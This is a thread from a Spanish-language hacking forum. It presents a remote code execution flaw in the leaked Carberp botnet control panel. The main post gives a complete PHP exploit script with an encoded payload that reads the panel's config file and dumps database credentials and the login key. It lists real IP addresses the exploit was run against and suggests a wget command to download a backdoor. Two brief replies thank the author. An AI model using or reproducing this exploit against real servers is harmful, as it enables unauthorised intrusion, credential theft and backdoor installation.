send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Carberp Remote Code Execution

  • 2 Respuestas
  • 1972 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado d1d4c

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Junio 29, 2013, 10:44:44 pm »
Todos estan mirando el codigo fuente de Carpberp, bootkit y otros componentes pero ¿Se han puesto a investigar el codigo fuente del panel?

Aqui hablare sobre una simple injeccion de codigo pero hay muchas mas vulnerabilidades en estos paneles filtrados.

Ejemplo: Codigo estupido que permite IP spoofing:




No, pero en serio la mejor vulnerabilidad es la de ejecucion remota de codigo(RCE), el tipo que escribio esto es realmente retrasado mental



Miren el bloque del eval()!

Oh que oportuno, algunos paneles de Carpberp  aparecieron en vx.vault


Ahora, escribamos un spl0it, pienso que la mayoria de ustedes vinieron por la prueba de concepto(PoC), verdad?

Código: PHP
  1. Carberp RCE
  2. <table width="607" border="0">
  3. <tr>
  4. <td><form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) ?>">
  5. <label for="carberp">Domain: </label>
  6. <input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
  7. <input type="submit" name="button" id="button" value="Ownz !" />
  8. </form></td>
  9. </tr>
  10. <tr>
  11. <td><?php
  12. /*
  13. Xyl2k!
  14. Greeting to Xartrick for fixing the payload (:
  15. */
  16. if(!You are not allowed to view links. Register or Login($_POST['urlz'])) ;
  17. else
  18. if(!You are not allowed to view links. Register or Login($_POST['urlz'], FILTER_VALIDATE_URL))
  19. {
  20. echo "<font color='red'>URL is not valid</font>";
  21. }
  22. else
  23. {
  24. {
  25. $data = You are not allowed to view links. Register or Login(
  26. 'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
  27. 'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
  28. $ch = You are not allowed to view links. Register or Login();
  29. You are not allowed to view links. Register or Login($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
  30. You are not allowed to view links. Register or Login($ch, CURLOPT_HEADER, 0);
  31. You are not allowed to view links. Register or Login($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  32. You are not allowed to view links. Register or Login($ch, CURLOPT_HTTPHEADER, You are not allowed to view links. Register or Login('Expect:'));
  33. You are not allowed to view links. Register or Login($ch, CURLOPT_RETURNTRANSFER, 1);
  34. You are not allowed to view links. Register or Login($ch, CURLOPT_POST, 1);
  35. You are not allowed to view links. Register or Login($ch,CURLOPT_TIMEOUT,30);
  36. You are not allowed to view links. Register or Login($ch, CURLOPT_POSTFIELDS, $data);
  37. $contents = You are not allowed to view links. Register or Login($ch);
  38. You are not allowed to view links. Register or Login($ch);
  39. if (You are not allowed to view links. Register or Login("#-#", $contents))
  40. { echo "<pre>" . $contents . "</pre>"; }
  41. else
  42. { echo "<font color='red'>Not vulnerable :(</font>"; }
  43. }
  44. }
  45. ?></td>
  46. </tr>
  47. </table>
  48.  

La parte codificada hace un file_get_contents() al includes/config.php
Luego se conecta ala base de datos y muestra las credenciales de Carberp.(en caso de que no tengamos phpMyAdmin)
Pero esto seria inútil si nosotros no podemos mostrar la pagina de ingreso debido ala llave de Autenticacion, asi que el poc analiza el index.php y lo obtiene.
Genial payload huh?
Probemoslo ...

37.221.165.123:




91.214.202.117:



Lo he probado en algunos mas C&C(comanda y controla) y todo salio bien.
Y esto en un RCE asi que puedes ejecutar cosas interesantes como system('wget You are not allowed to view links. Register or Login');
para descargar una puerta trasera o cualquier cosa

Fuente:You are not allowed to view links. Register or Login
Traducido por mi
« Última modificación: Noviembre 23, 2014, 02:16:48 pm por Expermicid »

Desconectado pekeinfo

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Julio 01, 2013, 02:21:02 am »
Excelente aporte seguro que hay mas de una vulnerabilidad.

Desconectado The Swash

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • Return to reversing!
    • Ver Perfil
    • Email
  • Skype: the_swash@outlook.com
« Respuesta #2 en: Julio 04, 2013, 09:14:41 am »
Si se dejaron escapar detalles como estos en el panel, no quisiera pensar los de código  :-X

Saludos y gracias!

 

¿Te gustó el post? COMPARTILO!



Codeando un exploit I: Source Code Disclosure

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1506
Último mensaje Febrero 24, 2010, 03:28:43 pm
por dracko.rx
Cpanel + FTP Cracker | Code Security

Iniciado por ANTRAX

Respuestas: 5
Vistas: 5055
Último mensaje Octubre 17, 2012, 11:43:48 am
por t0st4d0r
[Tutorial] Source Code Disclosure

Iniciado por arthusu

Respuestas: 0
Vistas: 1202
Último mensaje Julio 22, 2013, 10:58:42 pm
por arthusu
Shellter - Shell Code Injector

Iniciado por ZanGetsu

Respuestas: 0
Vistas: 2174
Último mensaje Agosto 12, 2014, 10:51:39 am
por ZanGetsu
PHP MatchMaker Remote User Reset Password Vulnerability

Iniciado por hielasangre

Respuestas: 0
Vistas: 1287
Último mensaje Agosto 27, 2011, 05:43:42 pm
por hielasangre